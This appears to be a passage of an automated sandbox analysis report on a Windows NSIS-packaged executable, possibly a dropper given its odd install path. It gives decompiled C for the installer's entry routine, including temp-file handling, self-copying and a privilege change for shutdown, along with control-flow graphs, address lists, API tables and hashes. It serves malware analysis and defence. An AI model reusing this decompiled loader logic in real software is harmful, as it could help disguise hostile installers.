404561 5585->5591 5588 4042d4 18 API calls 5586->5588 5587 4045d0 5589 40469a 5587->5589 5590 4045da GetDlgItem 5587->5590 5592 4044ab 5588->5592 5597 40433b 8 API calls 5589->5597 5593 4045f0 5590->5593 5594 404658 5590->5594 5591->5587 5591->5589 5595 4045a5 GetDlgItem SendMessageA 5591->5595 5596 4042d4 18 API calls 5592->5596 5593->5594 5601 404616 SendMessageA LoadCursorA SetCursor 5593->5601 5594->5589 5602 40466a 5594->5602 5618 4042f6 KiUserCallbackDispatcher 5595->5618 5599 4044b8 CheckDlgButton 5596->5599 5600 404695 5597->5600 5616 4042f6 KiUserCallbackDispatcher 5599->5616 5619 4046e3 5601->5619 5606 404670 SendMessageA 5602->5606 5607 404681 5602->5607 5603 4045cb 5609 4046bf SendMessageA 5603->5609 5606->5607 5607->5600 5608 404687 SendMessageA 5607->5608 5608->5600 5609->5587 5610 4044d6 GetDlgItem 5617 404309 SendMessageA 5610->5617 5613 4044ec SendMessageA 5614 404513 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5613->5614 5615 40450a GetSysColor 5613->5615 5614->5600 5615->5614 5616->5610 5617->5613 5618->5603 5622 405933 ShellExecuteExA 5619->5622 5621 404649 LoadCursorA SetCursor 5621->5594 5622->5621

                                                            Executed Functions

                                                            Function 004033B3 Relevance: 84.4, APIs: 33, Strings: 15, Instructions: 417stringfilecomCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 4033b3-403403 SetErrorMode GetVersionExA 1 403444 0->1 2 403405-40341f GetVersionExA 0->2 4 40344b 1->4 3 403421-403440 2->3 2->4 3->1 5 40344d-403458 4->5 6 40346f-403476 4->6 7 40345a-403469 5->7 8 40346b 5->8 9 403480-4034c0 6->9 10 403478 6->10 7->6 8->6 11 4034c2-4034ca call 406663 9->11 12 4034d3 9->12 10->9 11->12 17 4034cc 11->17 13 4034d8-4034ec call 4065f5 lstrlenA 12->13 19 4034ee-40350a call 406663 * 3 13->19 17->12 26 40351b-40357b #17 OleInitialize SHGetFileInfoA call 406257 GetCommandLineA call 406257 19->26 27 40350c-403512 19->27 34 403586-403599 call 405c14 CharNextA 26->34 35 40357d-403581 26->35 27->26 31 403514 27->31 31->26 38 40365a-40365e 34->38 35->34 39 403664 38->39 40 40359e-4035a1 38->40 43 403678-403692 GetTempPathA call 403382 39->43 41 4035a3-4035a7 40->41 42 4035a9-4035b0 40->42 41->41 41->42 45 4035b2-4035b3 42->45 46 4035b7-4035ba 42->46 52 403694-4036b2 GetWindowsDirectoryA lstrcatA call 403382 43->52 53 4036ea-403702 DeleteFileA call 402f0c 43->53 45->46 47 4035c0-4035c4 46->47 48 40364b-403657 call 405c14 46->48 50 4035c6-4035cc 47->50 51 4035dc-403609 47->51 48->38 67 403659 48->67 55 4035d2 50->55 56 4035ce-4035d0 50->56 57 40361b-403649 51->57 58 40360b-403611 51->58 52->53 69 4036b4-4036e4 GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 403382 52->69 70 403795-4037a6 call 403963 OleUninitialize 53->70 71 403708-40370e 53->71 55->51 56->51 56->55 57->48 65 403666-403673 call 406257 57->65 62 403613-403615 58->62 63 403617 58->63 62->57 62->63 63->57 65->43 67->38 69->53 69->70 81 4037ac-4037bb call 40596d ExitProcess 70->81 82 4038cf-4038d5 70->82 74 403710-40371b call 405c14 71->74 75 403786-40378d call 403a3d 71->75 84 403751-40375a 74->84 85 40371d-403746 74->85 83 403792 75->83 87 4038d7-4038ec GetCurrentProcess OpenProcessToken 82->87 88 40394d-403955 82->88 83->70 92 4037c1-4037d5 call 4058d8 lstrcatA 84->92 93 40375c-40376a call 405cd7 84->93 89 403748-40374a 85->89 95 40391d-40392b call 406663 87->95 96 4038ee-403917 LookupPrivilegeValueA AdjustTokenPrivileges 87->96 90 403957 88->90 91 40395a-40395d ExitProcess 88->91 89->84 97 40374c-40374f 89->97 90->91 105 4037e2-4037fc lstrcatA lstrcmpiA 92->105 106 4037d7-4037dd lstrcatA 92->106 93->70 104 40376c-403782 call 406257 * 2 93->104 107 403939-403944 ExitWindowsEx 95->107 108 40392d-403937 95->108 96->95 97->84 97->89 104->75 105->70 111 4037fe-403801 105->111 106->105 107->88 109 403946-403948 call 40140b 107->109 108->107 108->109 109->88 114 403803-403808 call 40583e 111->114 115 40380a call 4058bb 111->115 120 40380f-40381d SetCurrentDirectoryA 114->120 115->120 123 40382a-403855 call 406257 120->123 124 40381f-403825 call 406257 120->124 128 40385b-403878 call 4062ea DeleteFileA 123->128 124->123 131 4038b8-4038c1 128->131 132 40387a-40388a CopyFileA 128->132 131->128 133 4038c3-4038ca call 406030 131->133 132->131 134 40388c-4038ac call 406030 call 4062ea call 4058f0 132->134 133->70 134->131 143 4038ae-4038b5 CloseHandle 134->143 143->131
                                                            C-Code - Quality: 85%
                                                            			_entry_() {
				CHAR* _v8;
				long _v12;
				char _v16;
				long _v20;
				void* _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed int _v42;
				long _v44;
				signed int _v48;
				char _v163;
				char _v175;
				signed short _v182;
				struct _OSVERSIONINFOA _v196;
				struct _SHFILEINFOA _v548;
				intOrPtr* _t87;
				char* _t93;
				void* _t95;
				void* _t99;
				CHAR* _t101;
				signed int _t103;
				int _t106;
				void* _t107;
				int _t108;
				void* _t110;
				void* _t134;
				signed int _t150;
				void* _t153;
				void* _t158;
				intOrPtr* _t159;
				void* _t170;
				CHAR* _t173;
				void _t179;
				void* _t198;
				void* _t199;
				signed char* _t213;
				CHAR* _t217;
				void* _t223;

				_v20 = 0;
				_v8 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v12 = 0;
				_v16 = 0x20;
				SetErrorMode(0x8001); // executed
				_v196.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v196.dwOSVersionInfoSize = 0x9c;
				if(GetVersionExA( &_v196) != 0) {
					L3:
					_t223 = _v196.dwPlatformId - 2;
					L4:
					if(_t223 < 0) {
						_v42 = _v42 & 0x00000000;
						if(_v175 < 0x41) {
							_v48 = 0;
						} else {
							_v48 = _v175 - 0x40;
						}
					}
					if(_v196.dwMajorVersion < 0xa) {
						_v182 = _v182 & 0x00000000;
					}
					 *0x4524d8 = _v196.dwBuildNumber;
					 *0x4524dc = (_v196.dwMajorVersion & 0x0000ffff | _v196.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
					if( *0x4524de != 0x600) {
						_t159 = E00406663(0);
						if(_t159 != 0) {
							 *_t159(0xc00);
						}
					}
					_t217 = "UXTHEME";
					goto L14;
					while(1) {
						L37:
						_t179 =  *_t95;
						_t234 = _t179;
						if(_t179 == 0) {
							break;
						}
						__eflags = _t179 - 0x20;
						if(_t179 != 0x20) {
							L23:
							__eflags =  *_t95 - 0x22;
							_v16 = 0x20;
							if( *_t95 == 0x22) {
								_t95 = _t95 + 1;
								__eflags = _t95;
								_v16 = 0x22;
							}
							__eflags =  *_t95 - 0x2f;
							if( *_t95 != 0x2f) {
								L35:
								_t95 = E00405C14(_t95, _v16);
								__eflags =  *_t95 - 0x22;
								if(__eflags == 0) {
									_t95 = _t95 + 1;
									__eflags = _t95;
								}
								continue;
							} else {
								_t95 = _t95 + 1;
								__eflags =  *_t95 - 0x53;
								if( *_t95 != 0x53) {
									L30:
									__eflags =  *_t95 - ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC");
									if( *_t95 != ((( *0x40a183 << 0x00000008 |  *0x40a182) << 0x00000008 |  *0x40a181) << 0x00000008 | "NCRC")) {
										L34:
										__eflags =  *(_t95 - 2) - ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=");
										if( *(_t95 - 2) == ((( *0x40a17b << 0x00000008 |  *0x40a17a) << 0x00000008 |  *0x40a179) << 0x00000008 | " /D=")) {
											 *(_t95 - 2) =  *(_t95 - 2) & 0x00000000;
											__eflags = _t95 + 2;
											E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t95 + 2);
											L40:
											GetTempPathA(0x2000, 0x485000); // executed
											_t99 = E00403382(_t234);
											_t235 = _t99;
											if(_t99 != 0) {
												L43:
												DeleteFileA(0x483000); // executed
												_t101 = E00402F0C(_t237, _v12); // executed
												_v8 = _t101;
												if(_t101 != 0) {
													L53:
													E00403963();
													__imp__OleUninitialize();
													_t248 = _v8;
													if(_v8 == 0) {
														__eflags =  *0x4524b4;
														if( *0x4524b4 == 0) {
															L77:
															_t103 =  *0x4524cc;
															__eflags = _t103 - 0xffffffff;
															if(_t103 != 0xffffffff) {
																_v20 = _t103;
															}
															ExitProcess(_v20);
														}
														_t106 = OpenProcessToken(GetCurrentProcess(), 0x28,  &_v24);
														__eflags = _t106;
														if(_t106 != 0) {
															LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v40.Privileges));
															_v40.PrivilegeCount = 1;
															_v28 = 2;
															AdjustTokenPrivileges(_v24, 0,  &_v40, 0, 0, 0);
														}
														_t107 = E00406663(4);
														__eflags = _t107;
														if(_t107 == 0) {
															L75:
															_t108 = ExitWindowsEx(2, 0x80040002);
															__eflags = _t108;
															if(_t108 != 0) {
																goto L77;
															}
															goto L76;
														} else {
															_t110 =  *_t107(0, 0, 0, 0x25, 0x80040002);
															__eflags = _t110;
															if(_t110 == 0) {
																L76:
																E0040140B(9);
																goto L77;
															}
															goto L75;
														}
													}
													E0040596D(_v8, 0x200010);
													ExitProcess(2);
												}
												if( *0x45243c == _t101) {
													L52:
													 *0x4524cc =  *0x4524cc | 0xffffffff;
													_v20 = E00403A3D( *0x4524cc);
													goto L53;
												}
												_t213 = E00405C14(0x47b000, _t101);
												if(_t213 < 0x47b000) {
													L49:
													_t244 = _t213 - 0x47b000;
													_v8 = "Error launching installer";
													if(_t213 < 0x47b000) {
														_t173 = E004058D8(_t248);
														lstrcatA(0x485000, "~nsu");
														if(_t173 != 0) {
															lstrcatA(0x485000, "A");
														}
														lstrcatA(0x485000, ".tmp");
														if(lstrcmpiA(0x485000, 0x481000) != 0) {
															_push(0x485000);
															if(_t173 == 0) {
																E004058BB();
															} else {
																E0040583E();
															}
															SetCurrentDirectoryA(0x485000);
															if("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes" == 0) {
																E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", 0x481000);
															}
															E00406257(0x453000, _v24);
															_t194 = "A";
															_v12 = 0x1a;
															 *0x455000 = "A";
															do {
																E004062EA(_t173, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x120)));
																DeleteFileA(0x432050);
																_t173 = 0;
																if(_v8 != 0 && CopyFileA(0x489000, 0x432050, 1) != 0) {
																	E00406030(_t194, 0x432050, 0);
																	E004062EA(0, 0x432050, 0x485000, 0x432050,  *((intOrPtr*)( *0x452430 + 0x124)));
																	_t134 = E004058F0(0x432050);
																	if(_t134 != 0) {
																		CloseHandle(_t134);
																		_v8 = 0;
																	}
																}
																 *0x455000 =  *0x455000 + 1;
																_t62 =  &_v12;
																 *_t62 = _v12 - 1;
															} while ( *_t62 != 0);
															E00406030(_t194, 0x485000, _t173);
														}
														goto L53;
													}
													 *_t213 =  *_t213 & 0x00000000;
													_t214 =  &(_t213[4]);
													if(E00405CD7(_t244,  &(_t213[4])) == 0) {
														goto L53;
													}
													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
													E00406257("C:\\Users\\Albus\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Drukneddens\\Bruckled\\Kededes", _t214);
													_v8 = _v8 & 0x00000000;
													goto L52;
												}
												_t150 = (( *0x40a15b << 0x00000008 |  *0x40a15a) << 0x00000008 |  *0x40a159) << 0x00000008 | " _?=";
												while( *_t213 != _t150) {
													_t213 = _t213 - 1;
													if(_t213 >= 0x47b000) {
														continue;
													}
													goto L49;
												}
												goto L49;
											}
											GetWindowsDirectoryA(0x485000, 0x1ffb);
											lstrcatA(0x485000, "\\Temp");
											_t153 = E00403382(_t235);
											_t236 = _t153;
											if(_t153 != 0) {
												goto L43;
											}
											GetTempPathA(0x1ffc, 0x485000);
											lstrcatA(0x485000, "Low");
											SetEnvironmentVariableA("TEMP", 0x485000);
											SetEnvironmentVariableA("TMP", 0x485000);
											_t158 = E00403382(_t236);
											_t237 = _t158;
											if(_t158 == 0) {
												goto L53;
											}
											goto L43;
										}
										goto L35;
									}
									_t198 =  *((intOrPtr*)(_t95 + 4));
									__eflags = _t198 - 0x20;
									if(_t198 == 0x20) {
										L33:
										_t42 =  &_v12;
										 *_t42 = _v12 | 0x00000004;
										__eflags =  *_t42;
										goto L34;
									}
									__eflags = _t198;
									if(_t198 != 0) {
										goto L34;
									}
									goto L33;
								}
								_t199 =  *(_t95 + 1);
								__eflags = _t199 - 0x20;
								if(_t199 == 0x20) {
									L29:
									 *0x4524c0 = 1;
									goto L30;
								}
								__eflags = _t199;
								if(_t199 != 0) {
									goto L30;
								}
								goto L29;
							}
						} else {
							goto L22;
						}
						do {
							L22:
							_t95 = _t95 + 1;
							__eflags =  *_t95 - 0x20;
						} while ( *_t95 == 0x20);
						goto L23;
					}
					goto L40;
					L14:
					E004065F5(_t217); // executed
					_t217 =  &(_t217[lstrlenA(_t217) + 1]);
					if( *_t217 != 0) {
						goto L14;
					} else {
						E00406663(0xb);
						 *0x452424 = E00406663(9);
						_t87 = E00406663(7);
						if(_t87 != 0) {
							_t87 =  *_t87(0x1e);
							if(_t87 != 0) {
								 *0x4524dc =  *0x4524dc | 0x00000080;
							}
						}
						__imp__#17(_t170);
						__imp__OleInitialize(0); // executed
						 *0x4524e0 = _t87;
						SHGetFileInfoA(0x434050, 0,  &_v548, 0x160, 0); // executed
						E00406257(0x44e420, "NSIS Error");
						E00406257(0x47b000, GetCommandLineA());
						 *0x452420 = 0x400000;
						_t93 = 0x47b000;
						if( *0x47b000 == 0x22) {
							_v16 = 0x22;
							_t93 = 0x47b001;
						}
						_t95 = CharNextA(E00405C14(_t93, _v16));
						_v24 = _t95;
						goto L37;
					}
				}
				_v196.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v196);
				if(_v196.dwPlatformId != 2) {
					goto L4;
				} else {
					_v42 = 4;
					asm("sbb eax, eax");
					_v48 =  !( ~(_v196.szCSDVersion - 0x53)) & _v163 - 0x00000030;
					goto L3;
				}
			}









































                                                            0x004033c5
                                                            0x004033c8
                                                            0x004033cf
                                                            0x004033d2
                                                            0x004033d6
                                                            0x004033e9
                                                            0x004033ef
                                                            0x004033f2
                                                            0x004033f5
                                                            0x00403403
                                                            0x00403444
                                                            0x00403444
                                                            0x0040344b
                                                            0x0040344b
                                                            0x0040344d
                                                            0x00403458
                                                            0x0040346b
                                                            0x0040345a
                                                            0x00403465
                                                            0x00403465
                                                            0x00403458
                                                            0x00403476
                                                            0x00403478
                                                            0x00403478
                                                            0x0040348d
                                                            0x004034b2
                                                            0x004034c0
                                                            0x004034c3
                                                            0x004034ca
                                                            0x004034d1
                                                            0x004034d1
                                                            0x004034ca
                                                            0x004034d3
                                                            0x004034d3
                                                            0x0040365a
                                                            0x0040365a
                                                            0x0040365a
                                                            0x0040365c
                                                            0x0040365e
                                                            0x00000000
                                                            0x00000000
                                                            0x0040359e
                                                            0x004035a1
                                                            0x004035a9
                                                            0x004035a9
                                                            0x004035ac
                                                            0x004035b0
                                                            0x004035b2
                                                            0x004035b2
                                                            0x004035b3
                                                            0x004035b3
                                                            0x004035b7
                                                            0x004035ba
                                                            0x0040364b
                                                            0x0040364f
                                                            0x00403654
                                                            0x00403657
                                                            0x00403659
                                                            0x00403659
                                                            0x00403659
                                                            0x00000000
                                                            0x004035c0
                                                            0x004035c0
                                                            0x004035c1
                                                            0x004035c4
                                                            0x004035dc
                                                            0x00403607
                                                            0x00403609
                                                            0x0040361b
                                                            0x00403646
                                                            0x00403649
                                                            0x00403666
                                                            0x0040366a
                                                            0x00403673
                                                            0x00403678
                                                            0x00403689
                                                            0x0040368b
                                                            0x00403690
                                                            0x00403692
                                                            0x004036ea
                                                            0x004036ef
                                                            0x004036f8
                                                            0x004036ff
                                                            0x00403702
                                                            0x00403795
                                                            0x00403795
                                                            0x0040379a
                                                            0x004037a3
                                                            0x004037a6
                                                            0x004038cf
                                                            0x004038d5
                                                            0x0040394d
                                                            0x0040394d
                                                            0x00403952
                                                            0x00403955
                                                            0x00403957
                                                            0x00403957
                                                            0x0040395d
                                                            0x0040395d
                                                            0x004038e4
                                                            0x004038ea
                                                            0x004038ec
                                                            0x004038f8
                                                            0x00403909
                                                            0x00403910
                                                            0x00403917
                                                            0x00403917
                                                            0x0040391f
                                                            0x00403924
                                                            0x0040392b
                                                            0x00403939
                                                            0x0040393c
                                                            0x00403942
                                                            0x00403944
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040392d
                                                            0x00403933
                                                            0x00403935
                                                            0x00403937
                                                            0x00403946
                                                            0x00403948
                                                            0x00000000
                                                            0x00403948
                                                            0x00000000
                                                            0x00403937
                                                            0x0040392b
                                                            0x004037b4
                                                            0x004037bb
                                                            0x004037bb
                                                            0x0040370e
                                                            0x00403786
                                                            0x00403786
                                                            0x00403792
                                                            0x00000000
                                                            0x00403792
                                                            0x00403717
                                                            0x0040371b
                                                            0x00403751
                                                            0x00403751
                                                            0x00403753
                                                            0x0040375a
                                                            0x004037cc
                                                            0x004037ce
                                                            0x004037d5
                                                            0x004037dd
                                                            0x004037dd
                                                            0x004037e8
                                                            0x004037fc
                                                            0x00403800
                                                            0x00403801
                                                            0x0040380a
                                                            0x00403803
                                                            0x00403803
                                                            0x00403803
                                                            0x00403810
                                                            0x0040381d
                                                            0x00403825
                                                            0x00403825
                                                            0x00403832
                                                            0x00403837
                                                            0x00403841
                                                            0x00403855
                                                            0x0040385b
                                                            0x00403867
                                                            0x0040386d
                                                            0x00403873
                                                            0x00403878
                                                            0x0040388e
                                                            0x0040389f
                                                            0x004038a5
                                                            0x004038ac
                                                            0x004038af
                                                            0x004038b5
                                                            0x004038b5
                                                            0x004038ac
                                                            0x004038b8
                                                            0x004038be
                                                            0x004038be
                                                            0x004038be
                                                            0x004038c5
                                                            0x004038c5
                                                            0x00000000
                                                            0x004037fc
                                                            0x0040375c
                                                            0x0040375f
                                                            0x0040376a
                                                            0x00000000
                                                            0x00000000
                                                            0x00403772
                                                            0x0040377d
                                                            0x00403782
                                                            0x00000000
                                                            0x00403782
                                                            0x00403746
                                                            0x00403748
                                                            0x0040374c
                                                            0x0040374f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040374f
                                                            0x00000000
                                                            0x00403748
                                                            0x0040369a
                                                            0x004036a6
                                                            0x004036ab
                                                            0x004036b0
                                                            0x004036b2
                                                            0x00000000
                                                            0x00000000
                                                            0x004036ba
                                                            0x004036c2
                                                            0x004036d3
                                                            0x004036db
                                                            0x004036dd
                                                            0x004036e2
                                                            0x004036e4
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004036e4
                                                            0x00000000
                                                            0x00403649
                                                            0x0040360b
                                                            0x0040360e
                                                            0x00403611
                                                            0x00403617
                                                            0x00403617
                                                            0x00403617
                                                            0x00403617
                                                            0x00000000
                                                            0x00403617
                                                            0x00403613
                                                            0x00403615
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00403615
                                                            0x004035c6
                                                            0x004035c9
                                                            0x004035cc
                                                            0x004035d2
                                                            0x004035d2
                                                            0x00000000
                                                            0x004035d2
                                                            0x004035ce
                                                            0x004035d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004035d0
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004035a3
                                                            0x004035a3
                                                            0x004035a3
                                                            0x004035a4
                                                            0x004035a4
                                                            0x00000000
                                                            0x004035a3
                                                            0x00000000
                                                            0x004034d8
                                                            0x004034d9
                                                            0x004034e5
                                                            0x004034ec
                                                            0x00000000
                                                            0x004034ee
                                                            0x004034f0
                                                            0x004034fe
                                                            0x00403503
                                                            0x0040350a
                                                            0x0040350e
                                                            0x00403512
                                                            0x00403514
                                                            0x00403514
                                                            0x00403512
                                                            0x0040351c
                                                            0x00403523
                                                            0x00403529
                                                            0x00403541
                                                            0x00403551
                                                            0x00403563
                                                            0x0040356f
                                                            0x00403579
                                                            0x0040357b
                                                            0x0040357d
                                                            0x00403581
                                                            0x00403581
                                                            0x00403590
                                                            0x00403596
                                                            0x00000000
                                                            0x00403596
                                                            0x004034ec
                                                            0x0040340b
                                                            0x00403416
                                                            0x0040341f
                                                            0x00000000
                                                            0x00403421
                                                            0x00403434
                                                            0x0040343a
                                                            0x00403440
                                                            0x00000000
                                                            0x00403440

                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004033D6
                                                            • GetVersionExA.KERNEL32(?), ref: 004033FF
                                                            • GetVersionExA.KERNEL32(0000009C), ref: 00403416
                                                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034DF
                                                            • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040351C
                                                            • OleInitialize.OLE32(00000000), ref: 00403523
                                                            • SHGetFileInfoA.SHELL32(00434050,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 00403541
                                                            • GetCommandLineA.KERNEL32(0044E420,NSIS Error,?,00000007,00000009,0000000B), ref: 00403556
                                                            • CharNextA.USER32(00000000), ref: 00403590
                                                            • GetTempPathA.KERNEL32(00002000,00485000), ref: 00403689
                                                            • GetWindowsDirectoryA.KERNEL32(00485000,00001FFB,?,00000007,00000009,0000000B), ref: 0040369A
                                                            • lstrcatA.KERNEL32(00485000,\Temp,?,00000007,00000009,0000000B), ref: 004036A6
                                                            • GetTempPathA.KERNEL32(00001FFC,00485000), ref: 004036BA
                                                            • lstrcatA.KERNEL32(00485000,Low,?,00000007,00000009,0000000B), ref: 004036C2
                                                            • SetEnvironmentVariableA.KERNEL32(TEMP,00485000,00485000,Low,?,00000007,00000009,0000000B), ref: 004036D3
                                                            • SetEnvironmentVariableA.KERNEL32(TMP,00485000,?,00000007,00000009,0000000B), ref: 004036DB
                                                            • DeleteFileA.KERNELBASE(00483000,?,00000007,00000009,0000000B), ref: 004036EF
                                                            • OleUninitialize.OLE32 ref: 0040379A
                                                            • ExitProcess.KERNEL32 ref: 004037BB
                                                            • lstrcatA.KERNEL32(00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037CE
                                                            • lstrcatA.KERNEL32(00485000,0040A14C,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037DD
                                                            • lstrcatA.KERNEL32(00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037E8
                                                            • lstrcmpiA.KERNEL32(00485000,00481000,00485000,.tmp,00485000,~nsu,0047B000,00000000,?,?,00000007,00000009,0000000B), ref: 004037F4
                                                            • SetCurrentDirectoryA.KERNEL32(00485000,00485000,?,00000007,00000009,0000000B), ref: 00403810
                                                            • DeleteFileA.KERNEL32(00432050,00432050,?,00453000,?,?,00000007,00000009,0000000B), ref: 0040386D
                                                            • CopyFileA.KERNEL32 ref: 00403882
                                                            • CloseHandle.KERNEL32(00000000), ref: 004038AF
                                                            • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 004038DD
                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 004038E4
                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403917
                                                            • ExitWindowsEx.USER32(00000002,80040002), ref: 0040393C
                                                            • ExitProcess.KERNEL32 ref: 0040395D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                            • String ID: "$.tmp$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Drukneddens\Bruckled\Kededes$Error launching installer$Low$NSIS Error$P C$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                            • API String ID: 1000954069-3321099877
                                                            • Opcode ID: e91d8d7e0acfa7466b43f1949bb7c617c824f3dc3e8a6da219fe6e6d5f30964f
                                                            • Instruction ID: 35a904cfeb39216351fef3eee688bc31b7ac6ceac067f98900564130ed648918
                                                            • Opcode Fuzzy Hash: e91d8d7e0acfa7466b43f1949bb7c617c824f3dc3e8a6da219fe6e6d5f30964f
                                                            • Instruction Fuzzy Hash: DBE10470904354AADB216F758D49BAF7EB8AF4630AF0440BFE445B62D2C77C4A44CB2E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004054B6 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282windowclipboardmemoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 144 4054b6-4054d2 145 405661-405667 144->145 146 4054d8-40559f GetDlgItem * 3 call 404309 call 404bfa GetClientRect GetSystemMetrics SendMessageA * 2 144->146 147 405691-40569d 145->147 148 405669-40568b GetDlgItem CreateThread CloseHandle 145->148 164 4055a1-4055bb SendMessageA * 2 146->164 165 4055bd-4055c0 146->165 151 4056bf-4056c5 147->151 152 40569f-4056a5 147->152 148->147 156 4056c7-4056cd 151->156 157 40571a-40571d 151->157 154 4056e0-4056e7 call 40433b 152->154 155 4056a7-4056ba ShowWindow * 2 call 404309 152->155 168 4056ec-4056f0 154->168 155->151 161 4056f3-405703 ShowWindow 156->161 162 4056cf-4056db call 4042ad 156->162 157->154 159 40571f-405725 157->159 159->154 166 405727-40573a SendMessageA 159->166 169 405713-405715 call 4042ad 161->169 170 405705-40570e call 405378 161->170 162->154 164->165 172 4055d0-4055e7 call 4042d4 165->172 173 4055c2-4055ce SendMessageA 165->173 174 405740-40576c CreatePopupMenu call 4062ea AppendMenuA 166->174 175 405837-405839 166->175 169->157 170->169 183 4055e9-4055fd ShowWindow 172->183 184 40561d-40563e GetDlgItem SendMessageA 172->184 173->172 181 405781-405797 TrackPopupMenu 174->181 182 40576e-40577e GetWindowRect 174->182 175->168 181->175 185 40579d-4057b7 181->185 182->181 186 40560c 183->186 187 4055ff-40560a ShowWindow 183->187 184->175 188 405644-40565c SendMessageA * 2 184->188 189 4057bc-4057d7 SendMessageA 185->189 190 405612-405618 call 404309 186->190 187->190 188->175 189->189 191 4057d9-4057f9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 189->191 190->184 193 4057fb-40581b SendMessageA 191->193 193->193 194 40581d-405831 GlobalUnlock SetClipboardData CloseClipboard 193->194 194->175
                                                            C-Code - Quality: 95%
                                                            			E004054B6(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				void* _t102;
				intOrPtr _t113;
				void* _t121;
				intOrPtr _t124;
				struct HWND__* _t128;
